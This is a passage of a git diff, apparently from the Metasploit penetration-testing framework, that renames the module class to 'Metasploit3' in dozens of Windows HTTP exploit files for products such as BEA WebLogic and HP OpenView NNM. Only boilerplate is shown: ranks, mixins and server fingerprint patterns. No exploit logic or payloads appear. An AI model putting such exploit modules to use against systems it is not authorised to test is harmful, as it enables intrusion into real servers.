Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/http/adobe_robohelper_authbypass.rb b/modules/exploits/windows/http/adobe_robohelper_authbypass.rb index fe5dce64fc..0d3a53e3de 100644 --- a/modules/exploits/windows/http/adobe_robohelper_authbypass.rb +++ b/modules/exploits/windows/http/adobe_robohelper_authbypass.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } diff --git a/modules/exploits/windows/http/altn_securitygateway.rb b/modules/exploits/windows/http/altn_securitygateway.rb index 31ca7dbe5a..88bd797a13 100644 --- a/modules/exploits/windows/http/altn_securitygateway.rb +++ b/modules/exploits/windows/http/altn_securitygateway.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking # XXX: Automatic targetting used HttpFingerprint = { :uri => '/SecurityGateway.dll', :pattern => [ /SecurityGateway / ] } diff --git a/modules/exploits/windows/http/altn_webadmin.rb b/modules/exploits/windows/http/altn_webadmin.rb index e70b6fbb89..7336b28f7b 100644 --- a/modules/exploits/windows/http/altn_webadmin.rb +++ b/modules/exploits/windows/http/altn_webadmin.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/amlibweb_webquerydll_app.rb b/modules/exploits/windows/http/amlibweb_webquerydll_app.rb index 9070e34a12..074f885b40 100644 --- a/modules/exploits/windows/http/amlibweb_webquerydll_app.rb +++ b/modules/exploits/windows/http/amlibweb_webquerydll_app.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/http/apache_chunked.rb b/modules/exploits/windows/http/apache_chunked.rb index 90e04942ef..4f305e2f1a 100644 --- a/modules/exploits/windows/http/apache_chunked.rb +++ b/modules/exploits/windows/http/apache_chunked.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking HttpFingerprint = { :pattern => [ /Apache/ ] } diff --git a/modules/exploits/windows/http/apache_mod_rewrite_ldap.rb b/modules/exploits/windows/http/apache_mod_rewrite_ldap.rb index 7655b95d15..689f107920 100644 --- a/modules/exploits/windows/http/apache_mod_rewrite_ldap.rb +++ b/modules/exploits/windows/http/apache_mod_rewrite_ldap.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/apache_modjk_overflow.rb b/modules/exploits/windows/http/apache_modjk_overflow.rb index a52dc9b945..3569fe8827 100644 --- a/modules/exploits/windows/http/apache_modjk_overflow.rb +++ b/modules/exploits/windows/http/apache_modjk_overflow.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/http/avaya_ccr_imageupload_exec.rb b/modules/exploits/windows/http/avaya_ccr_imageupload_exec.rb index 1a8369647b..ee569d496f 100644 --- a/modules/exploits/windows/http/avaya_ccr_imageupload_exec.rb +++ b/modules/exploits/windows/http/avaya_ccr_imageupload_exec.rb @@ -6,7 +6,7 @@ require 'uri' require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/badblue_ext_overflow.rb b/modules/exploits/windows/http/badblue_ext_overflow.rb index 987ecc04c7..64898f93cc 100644 --- a/modules/exploits/windows/http/badblue_ext_overflow.rb +++ b/modules/exploits/windows/http/badblue_ext_overflow.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking # NOTE: BadBlue doesn't give any HTTP headers when requesting '/'. diff --git a/modules/exploits/windows/http/badblue_passthru.rb b/modules/exploits/windows/http/badblue_passthru.rb index a0b1c01133..ac84d2ff34 100644 --- a/modules/exploits/windows/http/badblue_passthru.rb +++ b/modules/exploits/windows/http/badblue_passthru.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking # NOTE: BadBlue doesn't give any HTTP headers when requesting '/'. diff --git a/modules/exploits/windows/http/bea_weblogic_jsessionid.rb b/modules/exploits/windows/http/bea_weblogic_jsessionid.rb index 31789b34a4..2119b57aab 100644 --- a/modules/exploits/windows/http/bea_weblogic_jsessionid.rb +++ b/modules/exploits/windows/http/bea_weblogic_jsessionid.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/http/bea_weblogic_post_bof.rb b/modules/exploits/windows/http/bea_weblogic_post_bof.rb index 6e1db8e6e2..6cf9e98863 100644 --- a/modules/exploits/windows/http/bea_weblogic_post_bof.rb +++ b/modules/exploits/windows/http/bea_weblogic_post_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking HttpFingerprint = { :pattern => [ /Apache/ ] } diff --git a/modules/exploits/windows/http/bea_weblogic_transfer_encoding.rb b/modules/exploits/windows/http/bea_weblogic_transfer_encoding.rb index 5b6609255f..df52e63683 100644 --- a/modules/exploits/windows/http/bea_weblogic_transfer_encoding.rb +++ b/modules/exploits/windows/http/bea_weblogic_transfer_encoding.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking HttpFingerprint = { :pattern => [ /Apache/ ] } diff --git a/modules/exploits/windows/http/belkin_bulldog.rb b/modules/exploits/windows/http/belkin_bulldog.rb index cd7f809655..a314fa36cf 100644 --- a/modules/exploits/windows/http/belkin_bulldog.rb +++ b/modules/exploits/windows/http/belkin_bulldog.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/ca_arcserve_rpc_authbypass.rb b/modules/exploits/windows/http/ca_arcserve_rpc_authbypass.rb index 3151a53bbb..9f5251b4e1 100644 --- a/modules/exploits/windows/http/ca_arcserve_rpc_authbypass.rb +++ b/modules/exploits/windows/http/ca_arcserve_rpc_authbypass.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/ca_igateway_debug.rb b/modules/exploits/windows/http/ca_igateway_debug.rb index 437bb30d01..c2bb5bdf61 100644 --- a/modules/exploits/windows/http/ca_igateway_debug.rb +++ b/modules/exploits/windows/http/ca_igateway_debug.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/http/ca_totaldefense_regeneratereports.rb b/modules/exploits/windows/http/ca_totaldefense_regeneratereports.rb index 99552155f3..bc48f73fd8 100644 --- a/modules/exploits/windows/http/ca_totaldefense_regeneratereports.rb +++ b/modules/exploits/windows/http/ca_totaldefense_regeneratereports.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::CmdStager diff --git a/modules/exploits/windows/http/cogent_datahub_command.rb b/modules/exploits/windows/http/cogent_datahub_command.rb index 3c4d145359..d9efe9d560 100644 --- a/modules/exploits/windows/http/cogent_datahub_command.rb +++ b/modules/exploits/windows/http/cogent_datahub_command.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote # Exploitation is reliable, but the service hangs and needs manual restarting. Rank = ManualRanking diff --git a/modules/exploits/windows/http/cogent_datahub_request_headers_bof.rb b/modules/exploits/windows/http/cogent_datahub_request_headers_bof.rb index c1484102f6..e0865db4c7 100644 --- a/modules/exploits/windows/http/cogent_datahub_request_headers_bof.rb +++ b/modules/exploits/windows/http/cogent_datahub_request_headers_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/coldfusion_fckeditor.rb b/modules/exploits/windows/http/coldfusion_fckeditor.rb index fd4dfa6a5a..769d496259 100644 --- a/modules/exploits/windows/http/coldfusion_fckeditor.rb +++ b/modules/exploits/windows/http/coldfusion_fckeditor.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking diff --git a/modules/exploits/windows/http/cyclope_ess_sqli.rb b/modules/exploits/windows/http/cyclope_ess_sqli.rb index 9b5d2b1bb7..a0747c46a7 100644 --- a/modules/exploits/windows/http/cyclope_ess_sqli.rb +++ b/modules/exploits/windows/http/cyclope_ess_sqli.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/desktopcentral_file_upload.rb b/modules/exploits/windows/http/desktopcentral_file_upload.rb index a794a81776..5525b7fb10 100644 --- a/modules/exploits/windows/http/desktopcentral_file_upload.rb +++ b/modules/exploits/windows/http/desktopcentral_file_upload.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/desktopcentral_statusupdate_upload.rb b/modules/exploits/windows/http/desktopcentral_statusupdate_upload.rb index 47af2229a2..079cdae430 100644 --- a/modules/exploits/windows/http/desktopcentral_statusupdate_upload.rb +++ b/modules/exploits/windows/http/desktopcentral_statusupdate_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/easyftp_list.rb b/modules/exploits/windows/http/easyftp_list.rb index 4bfa7a8e37..c7ef5b6ee7 100644 --- a/modules/exploits/windows/http/easyftp_list.rb +++ b/modules/exploits/windows/http/easyftp_list.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking HttpFingerprint = { :pattern => [ /Easy-Web Server\// ] } diff --git a/modules/exploits/windows/http/edirectory_host.rb b/modules/exploits/windows/http/edirectory_host.rb index 91c9c9bae5..7daa7bff70 100644 --- a/modules/exploits/windows/http/edirectory_host.rb +++ b/modules/exploits/windows/http/edirectory_host.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/http/edirectory_imonitor.rb b/modules/exploits/windows/http/edirectory_imonitor.rb index 77254a164b..ff37a76faa 100644 --- a/modules/exploits/windows/http/edirectory_imonitor.rb +++ b/modules/exploits/windows/http/edirectory_imonitor.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking HttpFingerprint = { :pattern => [ /DHost\//, /HttpStk\// ] } # custom port diff --git a/modules/exploits/windows/http/efs_easychatserver_username.rb b/modules/exploits/windows/http/efs_easychatserver_username.rb index 2bfb24ab2b..853bc561cd 100644 --- a/modules/exploits/windows/http/efs_easychatserver_username.rb +++ b/modules/exploits/windows/http/efs_easychatserver_username.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking HttpFingerprint = { :pattern => [ /Easy Chat Server\/1\.0/ ] } diff --git a/modules/exploits/windows/http/efs_fmws_userid_bof.rb b/modules/exploits/windows/http/efs_fmws_userid_bof.rb index 5e61f86a37..c71ee36629 100644 --- a/modules/exploits/windows/http/efs_fmws_userid_bof.rb +++ b/modules/exploits/windows/http/efs_fmws_userid_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking # Reliable memory corruption include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/ektron_xslt_exec.rb b/modules/exploits/windows/http/ektron_xslt_exec.rb index f79dec147a..3288d2c0d2 100644 --- a/modules/exploits/windows/http/ektron_xslt_exec.rb +++ b/modules/exploits/windows/http/ektron_xslt_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/file_dropper' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/ericom_access_now_bof.rb b/modules/exploits/windows/http/ericom_access_now_bof.rb index 4713a5d31f..a770467975 100644 --- a/modules/exploits/windows/http/ericom_access_now_bof.rb +++ b/modules/exploits/windows/http/ericom_access_now_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/ezserver_http.rb b/modules/exploits/windows/http/ezserver_http.rb index 9645d8a39f..772d2e31aa 100644 --- a/modules/exploits/windows/http/ezserver_http.rb +++ b/modules/exploits/windows/http/ezserver_http.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/http/fdm_auth_header.rb b/modules/exploits/windows/http/fdm_auth_header.rb index 6e95c2d915..6a396493ac 100644 --- a/modules/exploits/windows/http/fdm_auth_header.rb +++ b/modules/exploits/windows/http/fdm_auth_header.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking # w/auth required: [*] x.x.x.x ( 401-Basic realm="FDM Remote control server" ) diff --git a/modules/exploits/windows/http/generic_http_dll_injection.rb b/modules/exploits/windows/http/generic_http_dll_injection.rb index 383968979b..949c22a1e0 100644 --- a/modules/exploits/windows/http/generic_http_dll_injection.rb +++ b/modules/exploits/windows/http/generic_http_dll_injection.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/hp_autopass_license_traversal.rb b/modules/exploits/windows/http/hp_autopass_license_traversal.rb index 421f5f2d31..82245bab7a 100644 --- a/modules/exploits/windows/http/hp_autopass_license_traversal.rb +++ b/modules/exploits/windows/http/hp_autopass_license_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/hp_imc_bims_upload.rb b/modules/exploits/windows/http/hp_imc_bims_upload.rb index 5ed6e65568..eb447a6e35 100644 --- a/modules/exploits/windows/http/hp_imc_bims_upload.rb +++ b/modules/exploits/windows/http/hp_imc_bims_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } diff --git a/modules/exploits/windows/http/hp_imc_mibfileupload.rb b/modules/exploits/windows/http/hp_imc_mibfileupload.rb index 945a961292..f3366ccfbd 100644 --- a/modules/exploits/windows/http/hp_imc_mibfileupload.rb +++ b/modules/exploits/windows/http/hp_imc_mibfileupload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } diff --git a/modules/exploits/windows/http/hp_loadrunner_copyfiletoserver.rb b/modules/exploits/windows/http/hp_loadrunner_copyfiletoserver.rb index 39313f83f7..a41ebf45b8 100644 --- a/modules/exploits/windows/http/hp_loadrunner_copyfiletoserver.rb +++ b/modules/exploits/windows/http/hp_loadrunner_copyfiletoserver.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rexml/document' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /Apache-Coyote\/1\.1/ ] } diff --git a/modules/exploits/windows/http/hp_mpa_job_acct.rb b/modules/exploits/windows/http/hp_mpa_job_acct.rb index d54885e133..65ba7b2ac3 100644 --- a/modules/exploits/windows/http/hp_mpa_job_acct.rb +++ b/modules/exploits/windows/http/hp_mpa_job_acct.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/hp_nnm_getnnmdata_hostname.rb b/modules/exploits/windows/http/hp_nnm_getnnmdata_hostname.rb index 9c4916ec4a..4662a10c1d 100644 --- a/modules/exploits/windows/http/hp_nnm_getnnmdata_hostname.rb +++ b/modules/exploits/windows/http/hp_nnm_getnnmdata_hostname.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking HttpFingerPrint = { :method => 'HEAD', :uri => '/OvCgi/getnnmdata.exe', :pattern => /Hewlett-Packard Development Company/ } diff --git a/modules/exploits/windows/http/hp_nnm_getnnmdata_icount.rb b/modules/exploits/windows/http/hp_nnm_getnnmdata_icount.rb index d3a3355723..acc7ebc703 100644 --- a/modules/exploits/windows/http/hp_nnm_getnnmdata_icount.rb +++ b/modules/exploits/windows/http/hp_nnm_getnnmdata_icount.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking HttpFingerPrint = { :method => 'HEAD', :uri => '/OvCgi/getnnmdata.exe', :pattern => /Hewlett-Packard Development Company/ } diff --git a/modules/exploits/windows/http/hp_nnm_getnnmdata_maxage.rb b/modules/exploits/windows/http/hp_nnm_getnnmdata_maxage.rb index 6a0fedbc71..87bf5d4ac7 100644 --- a/modules/exploits/windows/http/hp_nnm_getnnmdata_maxage.rb +++ b/modules/exploits/windows/http/hp_nnm_getnnmdata_maxage.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking HttpFingerPrint = { :method => 'HEAD', :uri => '/OvCgi/getnnmdata.exe', :pattern => /Hewlett-Packard Development Company/ } diff --git a/modules/exploits/windows/http/hp_nnm_nnmrptconfig_nameparams.rb b/modules/exploits/windows/http/hp_nnm_nnmrptconfig_nameparams.rb index a8af4e37de..5b04429e57 100644 --- a/modules/exploits/windows/http/hp_nnm_nnmrptconfig_nameparams.rb +++ b/modules/exploits/windows/http/hp_nnm_nnmrptconfig_nameparams.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/hp_nnm_nnmrptconfig_schdparams.rb b/modules/exploits/windows/http/hp_nnm_nnmrptconfig_schdparams.rb index 5ea29a53ac..5a5e8f9e58 100644 --- a/modules/exploits/windows/http/hp_nnm_nnmrptconfig_schdparams.rb +++ b/modules/exploits/windows/http/hp_nnm_nnmrptconfig_schdparams.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/hp_nnm_openview5.rb b/modules/exploits/windows/http/hp_nnm_openview5.rb index 19fefd1ca5..303a6aa930 100644 --- a/modules/exploits/windows/http/hp_nnm_openview5.rb +++ b/modules/exploits/windows/http/hp_nnm_openview5.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/http/hp_nnm_ovalarm_lang.rb b/modules/exploits/windows/http/hp_nnm_ovalarm_lang.rb index c6e96bee4e..867dd837c6 100644 --- a/modules/exploits/windows/http/hp_nnm_ovalarm_lang.rb +++ b/modules/exploits/windows/http/hp_nnm_ovalarm_lang.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/hp_nnm_ovas.rb b/modules/exploits/windows/http/hp_nnm_ovas.rb index 318d8a1d66..c0c7a84d27 100644 --- a/modules/exploits/windows/http/hp_nnm_ovas.rb +++ b/modules/exploits/windows/http/hp_nnm_ovas.rb @@ -11,7 +11,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking # =( need more targets and perhaps more OS specific return values OS specific would be preferred diff --git a/modules/exploits/windows/http/hp_nnm_ovbuildpath_textfile.rb b/modules/exploits/windows/http/hp_nnm_ovbuildpath_textfile.rb index 8666f9ebeb..e9e798f40f 100644 --- a/modules/exploits/windows/http/hp_nnm_ovbuildpath_textfile.rb +++ b/modules/exploits/windows/http/hp_nnm_ovbuildpath_textfile.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking HttpFingerPrint = { :method => 'HEAD', :uri => '/OvCgi/webappmon.exe', :pattern => /Hewlett-Packard Development Company/ } diff --git a/modules/exploits/windows/http/hp_nnm_ovwebhelp.rb b/modules/exploits/windows/http/hp_nnm_ovwebhelp.rb index e0cdf627a3..f546994531 100644 --- a/modules/exploits/windows/http/hp_nnm_ovwebhelp.rb +++ b/modules/exploits/windows/http/hp_nnm_ovwebhelp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_main.rb b/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_main.rb index 6aca10de0c..5b2d8df90d 100644 --- a/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_main.rb +++ b/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_main.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking HttpFingerPrint = { :method => 'HEAD', :uri => '/OvCgi/jovgraph.exe', :pattern => /Hewlett-Packard Development Company/ } diff --git a/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_ovutil.rb b/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_ovutil.rb index 1eaf093bf8..e653bcf3c1 100644 --- a/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_ovutil.rb +++ b/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_ovutil.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking HttpFingerPrint = { :method => 'HEAD', :uri => '/OvCgi/jovgraph.exe', :pattern => /Hewlett-Packard Development Company/ } diff --git a/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_uro.rb b/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_uro.rb index cae76b8996..054d3c4090 100644 --- a/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_uro.rb +++ b/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_uro.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking HttpFingerPrint = { :method => 'HEAD', :uri => '/OvCgi/jovgraph.exe', :pattern => /Hewlett-Packard Development Company/ } diff --git a/modules/exploits/windows/http/hp_nnm_snmp.rb b/modules/exploits/windows/http/hp_nnm_snmp.rb index e593f4abe9..d2c98ea6ba 100644 --- a/modules/exploits/windows/http/hp_nnm_snmp.rb +++ b/modules/exploits/windows/http/hp_nnm_snmp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking diff --git a/modules/exploits/windows/http/hp_nnm_snmpviewer_actapp.rb b/modules/exploits/windows/http/hp_nnm_snmpviewer_actapp.rb index cecb0bfa06..18fbdce2b0 100644 --- a/modules/exploits/windows/http/hp_nnm_snmpviewer_actapp.rb +++ b/modules/exploits/windows/http/hp_nnm_snmpviewer_actapp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking HttpFingerPrint = { :method => 'HEAD', :uri => '/OvCgi/snmpviewer.exe', :pattern => /Hewlett-Packard Development Company/ } diff --git a/modules/exploits/windows/http/hp_nnm_toolbar_01.rb b/modules/exploits/windows/http/hp_nnm_toolbar_01.rb index 6ca3cc0383..e233bfd79b 100644 --- a/modules/exploits/windows/http/hp_nnm_toolbar_01.rb +++ b/modules/exploits/windows/http/hp_nnm_toolbar_01.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/hp_nnm_toolbar_02.rb b/modules/exploits/windows/http/hp_nnm_toolbar_02.rb index 4fe7676f0a..75609ae473 100644 --- a/modules/exploits/windows/http/hp_nnm_toolbar_02.rb +++ b/modules/exploits/windows/http/hp_nnm_toolbar_02.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/hp_nnm_webappmon_execvp.rb b/modules/exploits/windows/http/hp_nnm_webappmon_execvp.rb index cbbb02c370..44464a26e7 100644 --- a/modules/exploits/windows/http/hp_nnm_webappmon_execvp.rb +++ b/modules/exploits/windows/http/hp_nnm_webappmon_execvp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking HttpFingerPrint = { :method => 'HEAD', :uri => '/OvCgi/webappmon.exe', :pattern => /Hewlett-Packard Development Company/ } diff --git a/modules/exploits/windows/http/hp_nnm_webappmon_ovjavalocale.rb b/modules/exploits/windows/http/hp_nnm_webappmon_ovjavalocale.rb index 54be7fa00e..5dec29805a 100644 --- a/modules/exploits/windows/http/hp_nnm_webappmon_ovjavalocale.rb +++ b/modules/exploits/windows/http/hp_nnm_webappmon_ovjavalocale.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking HttpFingerPrint = { :method => 'HEAD', :uri => '/OvCgi/OpenView.exe', :pattern => /Hewlett-Packard Development Company/ } diff --git a/modules/exploits/windows/http/hp_openview_insight_backdoor.rb b/modules/exploits/windows/http/hp_openview_insight_backdoor.rb index acf7cfd1a6..691934ac8e 100644 --- a/modules/exploits/windows/http/hp_openview_insight_backdoor.rb +++ b/modules/exploits/windows/http/hp_openview_insight_backdoor.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } diff --git a/modules/exploits/windows/http/hp_pcm_snac_update_certificates.rb b/modules/exploits/windows/http/hp_pcm_snac_update_certificates.rb index 8cc3e74bfd..ed9ddab692 100644 --- a/modules/exploits/windows/http/hp_pcm_snac_update_certificates.rb +++ 